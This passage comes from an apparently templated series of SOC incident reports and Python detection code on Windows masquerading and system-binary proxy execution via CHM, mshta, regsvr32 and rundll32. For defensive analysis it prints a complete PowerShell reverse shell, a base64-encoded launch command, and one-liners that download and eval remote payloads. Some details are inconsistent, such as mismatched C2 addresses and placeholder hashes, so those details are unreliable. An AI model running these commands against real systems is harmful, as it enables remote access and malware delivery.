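    image: str               # Image: full path of the new process
    original_file_name: str  # OriginalFileName: name from the PE version resource
    parent_image: str        # ParentImage
    signed: bool             # signer status as an EDR would report it
    user: str


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def _in_system_dir(path: str) -> bool:
    return ntpath.dirname(path).lower() in SYSTEM_DIRS


def analyze(ev: ProcessEvent) -> list[tuple[str, str]]:
    """Return (technique, reason) pairs for the masquerading indicators present."""
    findings = []
    name = _basename(ev.image)
    original = ev.original_file_name.lower()
    parent = _basename(ev.parent_image)

    # T1036.003: the file is called svchost.exe but its version resource says cmd.exe.
    # Renaming does not invalidate a catalog signature, so this check does not rely on signing.
    if original and original != name:
        findings.append(("T1036.003", f"{name} is really {original} (OriginalFileName mismatch)"))

    # T1036.005: a system binary name running from a directory outside the Windows tree.
    if name in SYSTEM_BINARIES and not _in_system_dir(ev.image):
        findings.append(("T1036.005", f"{name} running from non-system path {ntpath.dirname(ev.image)}"))

    # A genuine copy of any of these binaries is Microsoft-signed.
    if name in SYSTEM_BINARIES and not ev.signed:
        findings.append(("T1036.005", f"{name} is unsigned"))

    # Lineage check: svchost.exe is started by services.exe, not by explorer.exe.
    expected = EXPECTED_PARENTS.get(name)
    if expected and parent not in expected:
        findings.append(("T1036", f"{name} spawned by {parent}, expected {sorted(expected)}"))
    return findings


# Constructed sample events modelled on the two alerts (not real telemetry).
SAMPLE_EVENTS = {
    "renamed_cmd": ProcessEvent(r"C:\Users\bturner\AppData\Local\Temp\svchost.exe", "Cmd.Exe",
                                r"C:\Windows\explorer.exe", True, "bturner"),
    "public_svchost": ProcessEvent(r"C:\Users\Public\svchost.exe", "svchost.exe",
                                   r"C:\Windows\explorer.exe", False, "kwilson"),
    "real_svchost": ProcessEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe",
                                 r"C:\Windows\System32\services.exe", True, "SYSTEM"),
    "real_cmd": ProcessEvent(r"C:\Windows\System32\cmd.exe", "Cmd.Exe",
                             r"C:\Windows\explorer.exe", True, "bturner"),
}


def triage(events: dict[str, ProcessEvent]) -> dict[str, list[str]]:
    """Map each event label to the sorted set of techniques it triggers."""
    return {label: sorted({tech for tech, _ in analyze(ev)}) for label, ev in events.items()}


if __name__ == "__main__":
    for label, ev in SAMPLE_EVENTS.items():
        print(label, analyze(ev))
```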
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed svchost.exe from Public folder |
| 2. File Analysis | Analyze svchost.exe | CrowdStrike Sandbox | Malicious executable (Cobalt Strike loader) |
| 3. Process Investigation | Identify source | CrowdStrike | Downloaded via drive-by download from compromised site |
| 4. User Interview | Contact kwilson | Teams, Phone | User visited news site, got pop-up; ran file |
| 5. Immediate Action | Terminate process, delete file | CrowdStrike | Process killed; file removed |
| 6. Account Remediation | Reset kwilson password | Azure AD, AD | Password reset; MFA enforced |
Jira Incident Report
Ticket: SOC-2024-193
Summary: T1036.005 – Malware Masquerading as svchost.exe in Public Folder
Status: RESOLVED
Resolution: MALICIOUS – Process Terminated
Priority: P2 – MEDIUM
Labels: T1036, match-name-location, masquerading, svchost, crowdstrike
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Process with System Name Running from User-Writable Path”.
Host: HR-WS-023 (HR, user kwilson).
Process: C:\Users\Public\svchost.exe.
Time: 2024-03-09 11:30 EST.
Technique: MITRE ATT&CK T1036.005 – Masquerading: Match Legitimate Name or Location.
2. Technical Analysis:
Attack Chain:
11:00 – User visits news-site.com (compromised)
11:05 – Fake “Chrome update” pop-up appears
11:06 – User clicks, downloads “ChromeUpdate.exe” (actually svchost.exe)
11:10 – User runs downloaded file
11:15 – Malware copies itself to C:\Users\Public\svchost.exe
11:20 – Malware executes from new location
11:25 – CrowdStrike detects
Masquerading Details:
Name: svchost.exe (legitimate Windows service host)
Location: C:\Users\Public\ (user-writable, not system path)
Expected Location: C:\Windows\System32\
File Size: 312 KB (vs legitimate ~45 KB)
Unsigned
Malware Analysis:
Type: Cobalt Strike loader
C2: 185.143.221[.]89:443
Persistence: Scheduled task “WindowsUpdate”
User Status:
User thought it was Chrome update
Unaware of malware
3. Investigation Findings:
Timeline:
11:00 – Compromised site visited
11:06 – Fake download
11:10 – Execution
11:15 – Moved to Public folder
11:20 – Execution from Public
11:25 – Alert
11:27 – SOC investigates
11:28 – Process terminated, file deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\Public\svchost.exe (SHA256: a1b2c3d4…)
– C:\Users\kwilson\Downloads\ChromeUpdate.exe
Scheduled Task:
– “WindowsUpdate”
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Terminated process.
Deleted malicious file.
Removed scheduled task.
Isolated host temporarily.
Reset user password.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User tricked by fake Chrome update.
Contributing Factors:
No application control.
User unaware of drive-by download risks.
6. Business Impact:
Operational Impact: HR workstation offline for 2 hours.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
User educated.
Technical Controls Enhanced:
Enhanced browser isolation for high-risk sites.
Created alert for system processes from user-writable paths.
8. Conclusion:
An attacker used malware masquerading as svchost.exe in a user-writable location to evade detection. CrowdStrike detected the anomalous path and enabled rapid removal.
Closure Rationale: Malware removed; user educated; account secured.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-09 12:30 EST
154. T1218.001 – Compiled HTML File (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-CHM-EXEC-1218-7842
Alert Time: 2024-03-09 16:30:45 EST
Severity: HIGH (85/100)
Source: Microsoft Defender for Endpoint
Rule: “Compiled HTML File (CHM) Executing Suspicious Code”
MITRE ATT&CK: T1218.001 – System Binary Proxy Execution: Compiled HTML File
Alert Details:
Detection: CHM file executed with script that spawns PowerShell
Host: SALES-WS-023 (Sales Workstation)
User: mwilson@company.com (Mike Wilson, Sales Rep)
File: C:\Users\mwilson\Downloads\Help_Document.chm
Time: 16:25 EST
Process Tree:
explorer.exe (PID: 2341)
hh.exe (HTML Help executable) (PID: 4789)
cmd.exe (PID: 4792)
powershell.exe (PID: 4795)
Command: powershell -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA==
CHM File Analysis:
File: Help_Document.chm
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Contains HTML with embedded JavaScript
JavaScript decodes and executes PowerShell command
Detection Logic:
hh.exe (legitimate CHM viewer) spawning cmd.exe and powershell.exe (unusual)
CHM file from Downloads folder (external source)
Encoded PowerShell command (reverse shell)
Pattern matches CHM-based execution bypass
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Defender alert | Microsoft 365 Defender | Confirmed CHM execution with PowerShell |
| 2. File Analysis | Analyze CHM file | Defender Sandbox | Malicious CHM with script to download Cobalt Strike |
| 3. User Interview | Contact mwilson | Teams, Phone | User opened CHM from email attachment |
| 4. Immediate Action | Terminate processes | Defender | hh.exe, cmd.exe, powershell.exe killed |
| 5. Email Investigation | Find source email | Proofpoint, Exchange | Email quarantined; attachment malicious |
| 6. Account Remediation | Reset mwilson password | Azure AD, AD | Password reset; MFA enforced |
Jira Incident Report
Ticket: SOC-2024-194
Summary: T1218.001 – Malicious CHM File Executes PowerShell Reverse Shell
Status: RESOLVED
Resolution: MALICIOUS – Process Terminated
Priority: P2 – MEDIUM
Labels: T1218, chm, compiled-html-file, defender, phishing
Components: Endpoint-Security, Phishing-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Compiled HTML File (CHM) Executing Suspicious Code”.
Host: SALES-WS-023 (Sales, user mwilson).
File: C:\Users\mwilson\Downloads\Help_Document.chm.
Time: 2024-03-09 16:30 EST.
Technique: MITRE ATT&CK T1218.001 – System Binary Proxy Execution: Compiled HTML File.
2. Technical Analysis:
Attack Chain:
16:00 – User receives phishing email with “Help_Document.chm”
16:05 – User opens attachment (CHM file)
16:06 – hh.exe launches, loads CHM
16:07 – CHM contains JavaScript that executes PowerShell
16:08 – PowerShell connects to C2 (185.143.221[.]89:443)
16:25 – Defender detects
CHM Exploitation:
Method: CHM files can contain HTML with scripts that run when opened
hh.exe is a trusted Windows binary (often allowed)
Bypass: Executes malicious code through trusted process
PowerShell Command (decoded):
```
$client = New-Object System.Net.Sockets.TCPClient('192.168.34.56',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
};
$client.Close()
```
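Decoding the -EncodedCommand argument recorded in the alert reproduces the first statement of the script above; the following Python is an added example for analysts, not part of the report, and the indicator patterns it surfaces (C2_SOCKET, INVOKE_EXPRESSION, DOWNLOAD_CRADLE) are assumptions about what is worth recording.

```python
from __future__ import annotations

import base64
import binascii
import re

# PowerShell accepts any prefix of -EncodedCommand (-e, -ec, -enc, ...), so match them all.
_PREFIXES = "|".join(re.escape("encodedcommand"[:n]) for n in range(1, 15))
ENCODED_ARG = re.compile(rf"[-/](?:{_PREFIXES})\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Patterns worth surfacing once the script is readable (assumed indicator set).
C2_SOCKET = re.compile(r"Net\.Sockets\.TCPClient\s*\(\s*['\"]([\d.]+)['\"]\s*,\s*(\d+)\s*\)", re.I)
INVOKE_EXPRESSION = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)
DOWNLOAD_CRADLE = re.compile(r"\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr)\b", re.I)


def decode_encoded_command(command_line: str) -> str | None:
    """Extract and decode the -EncodedCommand argument; None if absent or malformed."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        # The argument is Base64 of the script encoded as UTF-16LE, never UTF-8.
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_command(command_line: str) -> dict:
    """Decode the command and summarise the indicators a SOC analyst would record."""
    script = decode_encoded_command(command_line)
    result = {
        "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+hidden", command_line, re.I)),
        "decoded": script,
        "c2": None,
        "invoke_expression": False,
        "download_cradle": False,
    }
    if script is None:
        return result
    sock = C2_SOCKET.search(script)
    if sock:
        result["c2"] = (sock.group(1), int(sock.group(2)))
    result["invoke_expression"] = bool(INVOKE_EXPRESSION.search(script))
    result["download_cradle"] = bool(DOWNLOAD_CRADLE.search(script))
    return result


# The command line recorded in the alert (the encoded form of the first statement above).
ALERT_COMMAND = (
    "powershell -WindowStyle Hidden -EncodedCommand "
    "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBU"
    "AEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA=="
)

if __name__ == "__main__":
    print(analyze_command(ALERT_COMMAND))
```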
Impact:
C2 connection established
Attacker had access for ~17 minutes
3. Investigation Findings:
Timeline:
16:00 – Email received
16:05 – CHM opened
16:08 – C2 connection
16:25 – Alert
16:27 – SOC investigates
16:28 – Processes terminated
Indicators of Compromise (IoCs):
Files:
– Help_Document.chm (SHA256: a1b2c3d4…)
Network:
– C2: 192.168.34.56:443 (internal pivot)
– External: 185.143.221[.]89 (from other host logs)
Processes:
– hh.exe -> cmd.exe -> powershell.exe
4. Containment Actions:
Immediate Actions:
Terminated hh.exe, cmd.exe, powershell.exe.
Deleted CHM file.
Isolated host.
Reset user password.
Enforced MFA.
Host Remediation:
Full scan (clean).
Reimaged as precaution.
5. Root Cause Analysis:
Primary Cause: User opened malicious CHM attachment.
Contributing Factors:
CHM files allowed as email attachments.
No ASR rule blocking hh.exe child processes.
6. Business Impact:
Operational Impact: Sales workstation offline for 2 hours.
Data Exposure: System information only.
7. Remediation & Prevention:
Completed Actions:
Malware removed.
User educated.
Technical Controls Enhanced:
Blocked CHM attachments via email gateway.
Enabled ASR rule “Block executable content from email client and webmail”.
Enhanced monitoring for hh.exe spawning child processes.
8. Conclusion:
An attacker used a CHM file to execute a PowerShell reverse shell via hh.exe, a trusted Windows binary. Defender detected the anomalous process chain and enabled rapid termination.
Closure Rationale: Malware terminated; host cleaned; user educated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-09 17:30 EST
155. T1218.005 – Mshta Proxy Execution (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-Mshta-Proxy-1218-7842
Alert Time: 2024-03-09 10:30:22 EST
Severity: HIGH (88/100)
Source: CrowdStrike Falcon EDR
Rule: “Mshta.exe Executing Suspicious Script – Potential Proxy Execution”
MITRE ATT&CK: T1218.005 – System Binary Proxy Execution: Mshta
Alert Details:
Detection: Mshta.exe (HTML Application host) executing script from remote URL
Host: DEV-WS-045 (Development Workstation)
User: alexchen@company.com (Alex Chen, Engineer)
Time: 10:25 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
mshta.exe (PID: 4792)
Command: mshta.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://185.143.221[.]89/payload.hta",false);h.Send();eval(h.responseText)
Detection Logic:
Mshta.exe executing JavaScript (unusual for this user)
Script downloads and executes HTA payload from remote URL
Parent process cmd.exe (unusual for mshta.exe)
Destination IP known malicious
Pattern matches mshta proxy execution (commonly used for malware)
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed mshta.exe downloading remote script |
| 2. URL Analysis | Analyze payload URL | URLScan.io, VirusTotal | HTA file contains PowerShell download cradle |
| 3. Process Investigation | Identify source | CrowdStrike | User clicked link in email; cmd.exe launched mshta |
| 4. User Interview | Contact alexchen | Teams, Phone | User clicked “document” link; unaware |
| 5. Immediate Action | Terminate mshta.exe | CrowdStrike | Process killed |
| 6. Network Block | Block malicious URL | Palo Alto, Zscaler | URL and IP blocked |
Jira Incident Report
Ticket: SOC-2024-195
Summary: T1218.005 – Mshta Proxy Execution of Remote Payload
Status: RESOLVED
Resolution: MALICIOUS – Process Terminated
Priority: P2 – MEDIUM
Labels: T1218, mshta, proxy-execution, crowdstrike, phishing
Components: Endpoint-Security, Web-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Mshta.exe Executing Suspicious Script – Potential Proxy Execution”.
Host: DEV-WS-045 (Development, user alexchen).
Process: mshta.exe with JavaScript downloading remote HTA.
Time: 2024-03-09 10:30 EST.
Technique: MITRE ATT&CK T1218.005 – System Binary Proxy Execution: Mshta.
2. Technical Analysis:
Attack Chain:
10:10 – User receives phishing email with link
10:12 – User clicks link (to malicious HTA)
10:13 – Browser downloads .hta file (or directly triggers mshta)
10:14 – cmd.exe launches mshta with JavaScript
10:15 – mshta downloads additional payload from 185.143.221[.]89
10:25 – CrowdStrike detects
Mshta Technique:
Mshta.exe is a legitimate Microsoft binary for running HTML Applications
Abuse: Can execute JavaScript/VBScript to download and run malware
Bypass: Often allowed by application whitelisting
Payload Analysis:
URL: http://185.143.221[.]89/payload.hta
Content: HTA file with embedded PowerShell script
PowerShell: Downloads and executes Cobalt Strike beacon
Impact:
Malware attempted to execute (blocked before full execution)
3. Investigation Findings:
Timeline:
10:10 – Email received
10:12 – Link clicked
10:14-10:15 – mshta execution
10:25 – Alert
10:27 – SOC investigates
10:28 – Process terminated
10:29 – URL blocked
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload.hta
– IP: 185.143.221[.]89
Processes:
– mshta.exe with JavaScript
4. Containment Actions:
Immediate Actions:
Terminated mshta.exe.
Blocked URL and IP at firewall and proxy.
Isolated host temporarily.
Reset user password.
Host Remediation:
Full scan (clean).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No web filtering blocking malicious domain.
Mshta allowed to execute scripts.
6. Business Impact:
Operational Impact: Development workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
User educated.
Technical Controls Enhanced:
Blocked mshta.exe from executing script content via AppLocker.
Enhanced URL filtering.
Created alert for mshta with command-line script.
8. Conclusion:
An attacker used mshta.exe to download and execute a malicious HTA payload, leveraging a trusted Windows binary. CrowdStrike detected the anomalous behavior and terminated the process before full compromise.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-09 11:30 EST
End of Batch 31
Batch 32: Defense Evasion & Credential Access Incident Reports
156. T1218.010 – Regsvr32 Proxy Execution (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-REGSVR32-PROXY-1218-7842
Alert Time: 2024-03-10 09:30:15 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: “Regsvr32.exe Executing Remote COM Object – Potential Squiblydoo”
MITRE ATT&CK: T1218.010 – System Binary Proxy Execution: Regsvr32
Alert Details:
Detection: Regsvr32.exe used to execute remote scriptlet (Squiblydoo technique)
Host: FIN-WS-078 (Finance Workstation)
User: bturner@company.com (Brian Turner, Accountant)
Time: 09:25 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
regsvr32.exe (PID: 4792)
Command: regsvr32.exe /s /n /u /i:http://185.143.221[.]89/payload.sct scrobj.dll
Detection Logic:
Regsvr32.exe used with /i flag pointing to remote URL (anomalous)
Downloading scriptlet (.sct) from external IP
scrobj.dll (COM scriptlet) loaded
Parent process cmd.exe (unusual for legitimate regsvr32 usage)
Pattern matches “Squiblydoo” technique for executing arbitrary code via trusted binary
Additional Context:
User received phishing email with link earlier
URL payload.sct contains malicious script
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed regsvr32 remote scriptlet execution |
| 2. URL Analysis | Fetch and analyze payload.sct | URLScan.io, Sandbox | SCT file contains PowerShell download cradle |
| 3. Process Investigation | Identify source | CrowdStrike | User clicked link in email, launched cmd |
| 4. User Interview | Contact bturner | Teams, Phone | User clicked “document” link; unaware |
| 5. Immediate Action | Terminate regsvr32 process | CrowdStrike | Process killed |
| 6. Network Block | Block malicious URL | Palo Alto, Zscaler | URL and IP blocked |
Jira Incident Report
Ticket: SOC-2024-196
Summary: T1218.010 – Regsvr32 Squiblydoo Technique Executing Remote Scriptlet
Status: RESOLVED
Resolution: MALICIOUS – Process Terminated
Priority: P2 – MEDIUM
Labels: T1218, regsvr32, squiblydoo, proxy-execution, crowdstrike
Components: Endpoint-Security, Web-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Regsvr32.exe Executing Remote COM Object – Potential Squiblydoo”.
Host: FIN-WS-078 (Finance, user bturner).
Process: regsvr32.exe with remote scriptlet.
Time: 2024-03-10 09:30 EST.
Technique: MITRE ATT&CK T1218.010 – System Binary Proxy Execution: Regsvr32.
2. Technical Analysis:
Attack Chain:
09:10 – User receives phishing email with link
09:12 – User clicks link
09:13 – Browser triggers cmd.exe (or downloads script that launches cmd)
09:14 – cmd.exe launches regsvr32 with remote scriptlet URL
09:15 – regsvr32 downloads payload.sct from 185.143.221[.]89
09:20 – Scriptlet executes PowerShell (downloading Cobalt Strike)
09:25 – CrowdStrike detects
Regsvr32 Technique:
Binary: C:\Windows\System32\regsvr32.exe (trusted, often allowed)
Flags: /s (silent), /n (no register), /u (unregister), /i:
DLL: scrobj.dll (COM scriptlet handler)
Effect: Downloads and executes scriptlet (.sct) which can contain arbitrary script
Payload Analysis:
URL: http://185.143.221[.]89/payload.sct
Content: XML scriptlet with embedded VBScript that runs PowerShell
PowerShell: Downloads and executes Cobalt Strike beacon
Impact:
Scriptlet executed before detection
C2 connection attempted (blocked)
3. Investigation Findings:
Timeline:
09:10 – Email received
09:12 – Link clicked
09:14-09:20 – Scriptlet download and execution
09:25 – Alert
09:27 – SOC investigates
09:28 – Process terminated
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload.sct
– IP: 185.143.221[.]89
Processes:
– regsvr32.exe with /i flag to remote URL
4. Containment Actions:
Immediate Actions:
Terminated regsvr32 process.
Blocked URL and IP at firewall and proxy.
Isolated host temporarily.
Reset user password.
Host Remediation:
Full scan (clean).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No web filtering blocking malicious domain.
Regsvr32 allowed to download remote content.
6. Business Impact:
Operational Impact: Finance workstation offline for 1 hour.
Data Exposure: None (C2 blocked).
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
User educated.
Technical Controls Enhanced:
Blocked regsvr32 from making outbound connections via firewall.
Enhanced URL filtering.
Created alert for regsvr32 with /i flag.
8. Conclusion:
An attacker used regsvr32.exe with the Squiblydoo technique to download and execute a malicious scriptlet, bypassing application whitelisting. CrowdStrike detected the anomalous behavior and terminated the process.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Your Name], SOC Analyst
Date: 2024-03-10 10:30 EST
157. T1218.011 – Rundll32 Proxy Execution (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-RUNDLL32-PROXY-1218-7842
Alert Time: 2024-03-10 14:15:33 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: “Rundll32.exe Executing Remote JavaScript – Potential Squiblydoo”
MITRE ATT&CK: T1218.011 – System Binary Proxy Execution: Rundll32
Alert Details:
Detection: Rundll32.exe executing JavaScript from remote URL
Host: ENG-WS-045 (Engineering Workstation)
User: alexchen@company.com (Alex Chen, Engineer)
Time: 14:10 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
rundll32.exe (PID: 4792)
Command: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://185.143.221[.]89/payload",false);h.Send();eval(h.responseText)
Detection Logic:
Rundll32.exe executing JavaScript (unusual)
JavaScript downloads and executes payload from remote URL
Parent process cmd.exe (unusual for rundll32)
Destination IP known malicious
Pattern matches rundll32 proxy execution
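One rule set that covers the four proxy-execution alerts in this batch (hh.exe child processes, mshta.exe inline script, regsvr32.exe /i: with a remote scriptlet, rundll32.exe with a javascript: URL), written as an added Python example rather than any vendor's detection logic. The parent baseline SUSPICIOUS_PARENTS and the sample events are constructed; the sample command lines reuse the ones quoted in the alerts, with IPs left defanged as on the page.

```python
from __future__ import annotations

import ntpath
import re

URL = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
SCRIPT_PROTOCOL = re.compile(r"\b(?:javascript|vbscript):", re.IGNORECASE)
REGSVR32_REMOTE = re.compile(r"/i:\s*https?://", re.IGNORECASE)

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe"}
PROXY_BINARIES = {"mshta.exe", "regsvr32.exe", "rundll32.exe"}
# Parents from which the proxy binaries are rarely launched legitimately (assumed baseline).
SUSPICIOUS_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                      "winword.exe", "excel.exe", "outlook.exe"}


def _name(path: str) -> str:
    return ntpath.basename(path).lower()


# Each rule: (technique, description, predicate(parent, image, command_line)).
RULES = [
    ("T1218.001", "hh.exe spawning a shell or script host",
     lambda p, i, c: p == "hh.exe" and i in SCRIPT_HOSTS),
    ("T1218.005", "mshta.exe running inline script or a remote HTA",
     lambda p, i, c: i == "mshta.exe" and bool(SCRIPT_PROTOCOL.search(c) or URL.search(c))),
    ("T1218.010", "regsvr32.exe loading a remote scriptlet via /i: and scrobj.dll",
     lambda p, i, c: i == "regsvr32.exe" and bool(REGSVR32_REMOTE.search(c) or "scrobj.dll" in c.lower())),
    ("T1218.011", "rundll32.exe executing a javascript: URL through mshtml",
     lambda p, i, c: i == "rundll32.exe" and bool(SCRIPT_PROTOCOL.search(c))),
]


def evaluate(event: dict) -> dict:
    """Apply the rules to one process-create event and return what matched."""
    parent, image = _name(event["parent_image"]), _name(event["image"])
    cmd = event["command_line"]
    return {
        "techniques": [tech for tech, _, pred in RULES if pred(parent, image, cmd)],
        "remote_urls": URL.findall(cmd),           # context for the network-block step
        "unusual_parent": image in PROXY_BINARIES and parent in SUSPICIOUS_PARENTS,
    }


# Constructed events mirroring the four alerts plus two benign controls (not real telemetry).
SAMPLE_EVENTS = [
    {"label": "chm", "parent_image": r"C:\Windows\hh.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell -WindowStyle Hidden -EncodedCommand <base64 omitted>"},
    {"label": "mshta", "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'''mshta.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://185.143.221[.]89/payload.hta",false);h.Send();eval(h.responseText)'''},
    {"label": "regsvr32", "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": "regsvr32.exe /s /n /u /i:http://185.143.221[.]89/payload.sct scrobj.dll"},
    {"label": "rundll32", "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'''rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://185.143.221[.]89/payload",false);h.Send();eval(h.responseText)'''},
    {"label": "benign_svchost", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "command_line": "svchost.exe -k netsvcs"},
    {"label": "benign_regsvr32", "parent_image": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r'regsvr32.exe /s "C:\Program Files\Vendor\lib.dll"'},
]


def run_all(events: list[dict] = SAMPLE_EVENTS) -> dict[str, dict]:
    """Evaluate every sample event, keyed by its label."""
    return {event["label"]: evaluate(event) for event in events}


if __name__ == "__main__":
    for label, verdict in run_all().items():
        print(label, verdict)
```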
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed rundll32 JavaScript execution |
| 2. URL Analysis | Analyze payload URL | URLScan.io, VirusTotal | Payload contains PowerShell reverse shell |
| 3. Process Investigation | Identify source | CrowdStrike | User clicked link in email |
| 4. User Interview | Contact alexchen | Teams, Phone | User clicked “report” link; unaware |
| 5. Immediate Action | Terminate rundll32 process | CrowdStrike | Process killed |
| 6. Network Block | Block malicious URL | Palo Alto, Zscaler | URL and IP blocked |
Jira Incident Report
Ticket: SOC-2024-197
Summary: T1218.011 – Rundll32 JavaScript Proxy Execution
Status: RESOLVED
Resolution: MALICIOUS – Process Terminated
Priority: P2 – MEDIUM
Labels: T1218, rundll32, proxy-execution, crowdstrike, phishing
Components: Endpoint-Security, Web-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Rundll32.exe Executing Remote JavaScript – Potential Squiblydoo”.
Host: ENG-WS-045 (Engineering, user alexchen).
Process: rundll32.exe with JavaScript executing remote payload.
Time: 2024-03-10 14:15 EST.
Technique: MITRE ATT&CK T1218.011 – System Binary Proxy Execution: Rundll32.
2. Technical Analysis:
Attack Chain:
14:00 – User receives phishing email with link
14:02 – User clicks link
14:03 – Browser triggers cmd.exe
14:04 – cmd.exe launches rundll32 with JavaScript
14:05 – JavaScript downloads payload from 185.143.221[.]89
14:06 – Payload executes PowerShell reverse shell
14:10 – CrowdStrike detects
Rundll32 Technique:
Binary: C:\Windows\System32\rundll32.exe (trusted)
Method: Uses the javascript: protocol handler to run script via mshtml.dll (RunHTMLApplication)
Effect: Can download and execute arbitrary code, bypassing whitelisting
Payload Analysis:
URL: http://185.143.221[.]89/payload
Content: PowerShell script (reverse shell)
Impact:
PowerShell reverse shell executed
C2 connection established (blocked)
3. Investigation Findings:
Timeline:
14:00 – Email received
14:02 – Link clicked
14:04-14:06 – Payload execution
14:10 – Alert
14:12 – SOC investigates
14:13 – Process terminated
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload
– IP: 185.143.221[.]89
Processes:
– rundll32.exe with JavaScript
4. Containment Actions:
Immediate Actions:
Terminated rundll32 process.
Blocked URL and IP.
Isolated host temporarily.
Reset user password.
Host Remediation:
Full scan (clean).
No reimage needed.
